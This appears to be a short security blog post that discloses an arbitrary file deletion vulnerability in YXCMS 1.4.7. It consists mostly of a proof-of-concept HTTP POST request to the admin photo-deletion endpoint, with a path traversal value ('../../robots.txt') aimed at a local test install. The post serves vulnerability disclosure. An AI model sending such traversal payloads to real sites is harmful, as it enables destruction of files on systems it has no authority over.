Hu3sky's blog

YXCMS 1.4.7 - Arbitrary file deletion

Word count: 164 / Reading time: 1 min
2018/09/12 Share

Explain

The Arbitrary file deletion is on the page http://127.0.0.1/cms/YXcms/index.php?r=admin/photo/delpic

POC

1

3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /cms/YXcms/index.php?r=admin/photo/delpic HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
Cookie: xwbR=e; security_level=0; lang=01f3de6ab556650fc41b06c36953a965bfed73e6%7Een; deviceid=1531019766994; xinhu_mo_adminid=1; xinhu_ca_adminuser=admin; xinhu_ca_rempass=0; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1533191574,1533518444,1533888717; PHPSESSID=c5638ad66889b1cc2301d8f55a32f13a; _utcpl=3fa38e8e609cc8283e8467749e14db2fs1; browserupdateorg=pause; phpwcmsBELang=en; XDEBUG_SESSION=PHPSTORM
X-Forwarded-For: 127.0.0.1
Connection: close
Upgrade-Insecure-Requests: 1

picname=../../robots.txt

2

CATALOG
  1. 1. Explain
  2. 2. POC